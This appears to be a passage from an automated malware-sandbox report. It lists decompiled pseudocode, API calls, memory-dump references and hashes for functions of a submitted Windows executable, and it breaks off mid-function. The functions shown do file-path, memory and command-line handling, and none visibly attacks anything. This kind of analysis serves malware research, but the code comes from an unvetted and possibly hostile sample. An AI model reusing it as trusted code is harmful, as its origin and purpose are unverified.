                                                                                                                                                                                                                                      0x00404b24
                                                                                                                                                                                                                                      0x00404b24
                                                                                                                                                                                                                                      0x00404b09
                                                                                                                                                                                                                                      0x00404aff
                                                                                                                                                                                                                                      0x00404adf
                                                                                                                                                                                                                                      0x00404adf
                                                                                                                                                                                                                                      0x00404adf
                                                                                                                                                                                                                                      0x00404b2e
                                                                                                                                                                                                                                      0x00404ab9
                                                                                                                                                                                                                                      0x00404abd
                                                                                                                                                                                                                                      0x00404abd

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403670: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040368F
                                                                                                                                                                                                                                        • Part of subcall function 00403670: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036A2
                                                                                                                                                                                                                                        • Part of subcall function 00403670: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036CA
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00404AD5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                                                      • Opcode ID: 12aa4578370520fb2a48921c6be8cec48dcb766140e63ad5826223bc0cefba80
                                                                                                                                                                                                                                      • Instruction ID: f10258cc04294a86b557939f114730014e6d7d6cfbb7bb8c04d30bf4c7a5b881
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12aa4578370520fb2a48921c6be8cec48dcb766140e63ad5826223bc0cefba80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E501B571200205ABDB148F19EE05FA23769FB84725F04823AFA25BA2F1DB74DC11CB9C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00406534(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0x408b3f
                                                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0x408b40
                                                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					return E004016D3(_t16, _t10, _t6);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                                                      			}












                                                                                                                                                                                                                                      0x0040653c
                                                                                                                                                                                                                                      0x0040653e
                                                                                                                                                                                                                                      0x00406540
                                                                                                                                                                                                                                      0x00406542
                                                                                                                                                                                                                                      0x00406542
                                                                                                                                                                                                                                      0x00406545
                                                                                                                                                                                                                                      0x00406545
                                                                                                                                                                                                                                      0x00406547
                                                                                                                                                                                                                                      0x00406548
                                                                                                                                                                                                                                      0x0040654c
                                                                                                                                                                                                                                      0x0040654e
                                                                                                                                                                                                                                      0x00406553
                                                                                                                                                                                                                                      0x0040655c
                                                                                                                                                                                                                                      0x00406560
                                                                                                                                                                                                                                      0x00406564
                                                                                                                                                                                                                                      0x0040656d
                                                                                                                                                                                                                                      0x0040656f
                                                                                                                                                                                                                                      0x00406572
                                                                                                                                                                                                                                      0x00406572
                                                                                                                                                                                                                                      0x0040656d
                                                                                                                                                                                                                                      0x00406573
                                                                                                                                                                                                                                      0x00406576
                                                                                                                                                                                                                                      0x0040657c
                                                                                                                                                                                                                                      0x0040657b
                                                                                                                                                                                                                                      0x0040657b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406586
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharPrevA.USER32(00408B3E,00408B3F,00000001,00408B3E,-00000003,?,0040609E,00401140,?), ref: 00406564
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                                                      • Opcode ID: af20124384c9e163f4c868c3eef576e04656bb073721edb5bb0fd2b77a8f9b11
                                                                                                                                                                                                                                      • Instruction ID: 2fefa65b55137457b6830ffbc24df23308a7c3126e0a8abcc0972023a19f200c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af20124384c9e163f4c868c3eef576e04656bb073721edb5bb0fd2b77a8f9b11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42F0F9329042506BD3214919BC84BA7BFDA9B86350F26057BD8DBA7395C5794C1282AD
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                                                      			E004061CE() {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t5 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                                                      					_t9 = E00405933( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					E00404495(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                      					 *0x409124 = E00406233();
                                                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                      0x004061d9
                                                                                                                                                                                                                                      0x004061e0
                                                                                                                                                                                                                                      0x004061f7
                                                                                                                                                                                                                                      0x0040621a
                                                                                                                                                                                                                                      0x00406222
                                                                                                                                                                                                                                      0x004061f9
                                                                                                                                                                                                                                      0x00406205
                                                                                                                                                                                                                                      0x0040620f
                                                                                                                                                                                                                                      0x00406214
                                                                                                                                                                                                                                      0x00406214
                                                                                                                                                                                                                                      0x00406232

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004061EF
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                        • Part of subcall function 00406233: GetLastError.KERNEL32(00405B72), ref: 00406233
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                                                      • Opcode ID: 90221e0438f8dbfb68e1634335627ec060f6a1ebdf1cc6804df710f07d1f2904
                                                                                                                                                                                                                                      • Instruction ID: d40de621aa6af983a241fd2d21fb75c5a96fbbc00e41df3bf81f1f6a68244fd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90221e0438f8dbfb68e1634335627ec060f6a1ebdf1cc6804df710f07d1f2904
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4F0E9B0704204ABE710FB758E02BBE36ACCB94304F41047EA687FA0C2DDB89D558A5C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00406656(CHAR* __ecx) {
                                                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                      0x00406659
                                                                                                                                                                                                                                      0x00406662
                                                                                                                                                                                                                                      0x0040666f
                                                                                                                                                                                                                                      0x00406664
                                                                                                                                                                                                                                      0x00406666
                                                                                                                                                                                                                                      0x00406666

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00404751,?,00404E08,?), ref: 00406659
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
                                                                                                                                                                                                                                      • Instruction ID: cf724d3271367a9020fb4afef3b00479d791c12cb86061ba68bd5a330777992d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BB092B652158402AA200A317C1995A2841B6C173ABE51BA1F033E01E0CA3FC866D009
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E004069C0() {
                                                                                                                                                                                                                                      				void _t1;
                                                                                                                                                                                                                                      				int _t2;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t1 =  *0x408524; // 0x0
                                                                                                                                                                                                                                      				 *0x4081fc = _t1;
                                                                                                                                                                                                                                      				_t2 = __getmainargs(0x4081e8, 0x4081ec, 0x4081f0,  *0x408520, 0x4081fc); // executed
                                                                                                                                                                                                                                      				 *0x4081f4 = _t2;
                                                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                      0x004069c0
                                                                                                                                                                                                                                      0x004069d0
                                                                                                                                                                                                                                      0x004069e4
                                                                                                                                                                                                                                      0x004069ed
                                                                                                                                                                                                                                      0x004069f2

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __getmainargs
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3565562838-0
                                                                                                                                                                                                                                      • Opcode ID: 8d004373edbcbdafa13157141f555c1e6c943f45bc4444ede4be50103b6b2963
                                                                                                                                                                                                                                      • Instruction ID: 73f7ab0b7eb3f661feeb8f148c12baaf3122a0c5a7b7096fb6085edff4de76c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d004373edbcbdafa13157141f555c1e6c943f45bc4444ede4be50103b6b2963
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D0C970A81305ABC6009F14AF02E013AA0AF0A704310007EB4C0B92E3DE755112BF4D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00404C70(long _a4) {
                                                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                      0x00404c7a
                                                                                                                                                                                                                                      0x00404c81

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 00404C7A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                                                      • Opcode ID: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
                                                                                                                                                                                                                                      • Instruction ID: 9573c9426388a2d7b89283d718c50bbdfd09632f04378d08ec902689231ba7f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83B0123204430CB7CF001FC2EC09F853F1DE7C4761F140010FA0C450508A729420869B
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00404C90(void* _a4) {
                                                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                      0x00404c98
                                                                                                                                                                                                                                      0x00404c9f

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                                                      • Opcode ID: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
                                                                                                                                                                                                                                      • Instruction ID: 12c573750d921541fd6cb29f5945249fc66636a9552ad745523379c0a512c5ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fe7bbbb28cd53af7a797c03c8a38af0ffb6b325bfffe95d671f986cc4886e11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52B0123100020CB7CF001F42ED088453F1DD6C02607000020F90C410218B339821858A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                                                      			E00405C50(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                                                      				_t61 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                                                      							do {
                                                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                                                      										break;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                      										break;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                                                      													return E00406C80(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                                                      							} while ( *_t69 != 0);
